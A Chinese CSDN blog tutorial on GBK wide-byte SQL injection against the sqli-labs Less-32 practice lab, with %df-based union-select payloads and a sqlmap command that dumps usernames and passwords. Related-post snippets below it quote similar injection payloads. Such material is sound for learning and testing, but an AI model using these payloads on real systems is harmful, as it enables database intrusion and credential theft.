【安全】P 2-20 宽字节SQL注入2

最新推荐文章于 2024-03-03 21:42:47 发布
最新推荐文章于 2024-03-03 21:42:47 发布
阅读量188 收藏
点赞数
分类专栏: 安全大师 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_David_Z/article/details/113818562
版权

目录

0X01 宽字节注入基础

最常使用的宽字节注入是利用%df,其实我们只要第一个ascii码大于128就可以了,比如ascii码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,然后在十六进制前面加%即可,即为%81
GBK首字节对应0×81-0xFE ,尾字节对应0×40-0xFE(除0×7F)

0X02 宽字节注入代码分析

Less-32 Bypass addslashes()
mysql_real_escape_string() 和 addslashes()功能类似
在这里插入图片描述

0X03 宽字节SQL注入演示

id=1%df’ --+
在这里插入图片描述

http://127.0.0.1/sqli-labs/Less-32/?id=-1%df%27%20union%20select%201,2,3%20–+
在这里插入图片描述

http://127.0.0.1/sqli-labs/Less-32/?id=-1%df%27%20union%20select%201,database(),3%20–+
在这里插入图片描述

0X04 sqlmap安全检测

sqlmap.py -u"http://url/?id=1" --tamper=unmagicquotes.py
在这里插入图片描述

sqlmap.py -u “http://127.0.0.1/sqli-labs/Less-32/?id=1” --tamper=unmagicquotes.py -D security -T users -C “username,password” --dump

-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

骆驼实验室
关注
专栏目录
安鸾渗透实战平台|字符注入
m_de_g的博客
12-17 2896
安鸾渗透实战平台|字符注入 一、渗透靶场地址 http://www.whalwl.work:8011 二、渗透实战 1.先使用1'进行测试,发现被斜杆转义 2.根据题目提示,直接上手宽字节注入,可以成功 ?id=1%df'--+ 3.测试or,and,==是否被过滤 ?id=1%df' or 1=1--+ 4.判断列 ?id=1%df' order by 1,2,3,4,5,6--+ 5.发现有5列,判断注入点 ?id=0%df' union select 1,2,3,4,5--+ 6.
SQL注入宽字节注入
剁椒咸鱼
10-08 462
SQL注入宽字节注入 https://blog.csdn.net/helloc0de/article/details/76180190
宽字节注入和二次编码注入(绕过/‘转义)less32-33
01mx的博客
03-27 2478
Unicode 统一码,也叫万国码、单一码(Unicode)是计算机科学领域里的一项业界标准,包括字符集、编码方案等。Unicode 是为了解决传统的字符编码方案的局限而产生的,它为每种语言中的每个字符设定了统一并且唯一的二进制编码,以满足跨语言、跨平台进行文本转换、处理的要求。 如果把各种文字编码形容为各地的方言,那么Unicode就是世界各国合作开发的一种语言。 字符(两个以上字节字符是指两个字节度的编码技术,如UNICODE、GBK、BIG5等。 我们这里的宽字节注入是利用的MySQL的一
宽字节注入
热门推荐
heiseweiye的博客
09-16 1万+
GBK注射 宽字节注入 ** 在使用PHP连接MySQL的时候,当设置“set character_set_client = gbk”时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入,当存在宽字节注入的时候,注入参数里带入% DF%27,即可把(%5C)吃掉,举个例子。 ** http://chinalover.sinaapp.com/SQL-GBK/in...
安鸾渗透实战平台-sql注入
weixin_48421613的博客
01-04 3390
sql注入安鸾渗透实战平台是一个在线的靶场平台,需要通过一些列手段找到flag提交 文章目录sql注入篇SQL字符型注入(1-2)一、需识别mysql默认的information库二、内部结构1.schemata表内容2.tables表内容3.columns表内容4.解题思路SQL搜索型注入总结 SQL字符型注入(1-2) 开始忘记截图了,只好给大家直接写一下payload了 提示:仅适合参考 一、需识别mysql默认的information库 mysql 5.0版本以上会有一个默认的infor
安全】P 2-19 字节SQL注入
Z_David_Z的博客
02-15 566
目录0X01 宽字节注入基础0X02 宽字节注入代码分析0X03 字节SQL注入演示0X04 sqlmap安全检测 0X01 宽字节注入基础 GBK 占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码,MYSQL默认字符集是GBK等字节字符集。 %DF’ :会被PHP当中的addslashes函数转义为“%DF’” ,“\”既URL里的“%5C”,那么也就是说,“%DF’”会被转成“%DF%5C%27”倘若网站的字符集是GBK,MYSQL使用的编码也是GBK的话,就会
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3102
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
SQL宽字节注入
qq_64332865的博客
02-19 3376
宽字节注入适用于cms和数据库对字符串的编码方式不统一、WAF利用 AddSlashes()等函数对敏感字符进行转义的场景。 统一的国际规范的理想状态是所有应用程序都使用Unicode编码,所有的网站 都使用UTF-8编码。但因为一些历史原因,国内及国外(特别是非英语国家)的一些cms仍然使用着自己国家的一套编码(如GBK);也有一些cms为了考 虑老用户,出了GBK和 UTF-8两个版本。 一个GBK编码汉字,占用2个字节;一个UTF-8编码的汉字,占用3-4个字节。当Web应用程序的编码方式为GBK,而
SQL Injection7(宽字节注入2)
kid的博客
05-10 316
SQL Injection7(宽字节注入2) 前言 前面结合sqli的32关卡初步理解了宽字节注入方法与原理 这里再结合sqli剩下的宽字节注入关卡(33,34,35,36,37)进行一个巩固和学习 练习 Less-33 这个我试了下,结果发现和Less-32完全一样啊,按照Less-32方法来完全可行 SQL Injection6(宽字节注入) 这里可以看我的上一篇博客,注入方法完全一样 我查了...
SQL注入
weixin_64655821的博客
10-23 891
SQL注入
25-1 SQL 注入攻击 - cookie base64编码注入
最新发布
weixin_43263566的博客
03-03 229
原理Base64编码的原理是将三个字节的二进制数据(共24位)转换成四个ASCII字符。由于每个ASCII字符可以表示64种状态(2^6),刚好可以用来表示24位二进制数据。这种编码方式通过将二进制数据划分为每组6位,然后将这6位的值转换为对应的Base64字符,从而实现编码过程。字符集大写英文字母:A-Z小写英文字母:a-z数字:0-9两个额外的符号,在不同的系统中可能有所不同,通常是和此外,为了使编码的结果能够被整除为4,Base64编码可能会在最后使用字符进行填充。编码表索引字符。
墨者SQL注入漏洞测试(字节)
wswr的博客
03-10 745
原理:就是用%df去吃掉转义字符 / ,然后就可以正常注入了 思路:还是一样找注入点,过一下,就是找页面源码找注入点,然后什么get啊post什么xff什么的都试试,最后是字节的,所以按照题设就是在可能出现注入的页面加上 %df%27(%27 就是 ’) 然后会发现报错,然后开始一步步注入咯 登入 找注入点通过查看页面源码(突然想到还有一种方法找注入页面,就是用F12然后去找跳转链接有没有存在注入页面,与本题无关QAQ) 然后就%df%27咯,发现注入点 order by 从1..
安鸾渗透实战平台wp(持续更新)
Delity的博客
05-13 6879
一、SQL注入 SQL数字型GET注入01 漏洞URL:http://www.whalwl.top:8001/bug/sql_injection/sql_num.php 1’报错,输入-1返回正常,构造payload, 判断字段:显示位在第二位和第三位 -1 order by 3 # 爆库: -1 union select 1,database(),3 # 爆表: -1 union select 1,group_concat(table_name),3 from information_sch
《Web安全攻防 渗透测试实战指南》学习笔记(5) - Sql注入
白帽子续命指南
04-12 848
如有侵权,请联系删除 Sql注入基础 information_schema 在MySOL 5.0之后,就多出了这个information_schema的数据库,该数据库中存有整个数据库的信息 我记得我最开始看这个的时候,总觉得是一个完整的数据库,里边按理说有很多的数据库,其中一个叫information_schema的数据库里又包含了一整个数据库,完全就是一中套娃的感觉。后来才知道,inform...
安全】P 6 文件上传漏洞(手工+工具)绕过合集
Z_David_Z的博客
02-27 3439
目录0X01 绕过JS验证JS验证代码分析Burpsuite剔除响应JS浏览器审计工具剔除JS上传Webshell,菜刀连接0X02 绕过MIME-Type验证MIME-Type介绍验证MIME-Type代码分析Burpsuite绕过MIME-Type验证菜刀连接 虚拟终端功能0X03 绕过黑名单验证基于文件后缀名验证介绍基于黑名单验证代码分析Burpsuite绕过黑名单验证上传webshell菜刀连接0X04 绕过黑名单验证(.htaccess).htaccess文件介绍配置文件http.conf审计黑名
安全】P 5-6 GET型CSRF漏洞利用方法
Z_David_Z的博客
02-23 2064
目录0X01 链接利用0X02 iframe利用0X03 img标签利用0X04 CSS-backgroud利用 0X01 链接利用 在html中,a标签代表链接,可以将当前的”焦点” 指引到其他位置。 移动的“焦点”需要发送对应的请求到链接指向的地址,然后返回响应。 <a href = “请求地址,会被http 请求到的位置,可以携带GET型参数”> 内容 </a> <a href = “http://127.0.0.1/csrf_test/get_csrf/new_user
安全】一次渗透测试完整流程
Z_David_Z的博客
01-13 1810
渗透测试完整流程前言渗透测试与入侵的最大区别常规渗透测试流程0x01 明确目标0x02 信息收集0x03 漏洞探测0x04 漏洞验证0x05 信息分析0x06 获取所需0x07 信息整理0x08 形成报告思维导图 前言 ==WEB安全渗透测试不是随便拿个工具扫一下就可以做的,要了解业务还需要给出解决方案。 == 渗透测试与入侵的最大区别 渗透测试:出于保护系统的目的,更全面地找出测试对象的安全隐患。 入侵:不择手段地(甚至具有破坏性的)拿到系统权限。 常规渗透测试流程 明确目标—>信息收集—>漏
计算机体系结构(简记)
Z_David_Z的博客
10-27 1662
复杂指令集(Complex Instruction Set Computer):每个指令做复杂动作,完成操作需要较少指令,庞大。各种编程语言开发的软件项目:Java、PHP、C、Python、Ruby、Go…客户端:迅雷、QQ、百度网盘、腾讯课堂、网易云音乐、游戏客户端、腾讯视频.…常见的手机处理器:高通骁龙系列、苹果A系列、海思、麒麟系列、联发科天玑系列。3.5寸机械盘、2.5寸机械盘、2.5寸SATA固态盘、M.2固态盘。输入设备:键盘、鼠标、麦克风、摄像头、扫描仪、数位板、游戏手柄等等;
Java面试必备:List接口、Set接口、ArrayList与LinkedList解析
- 防止SQL注入的方法是使用PreparedStatement预编译SQL,以参数化方式执行。 - 调用存储过程通常通过CallableStatement实现。 5. **连接池**: - 连接池用于管理和复用数据库连接,避免频繁创建和销毁连接,提高...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值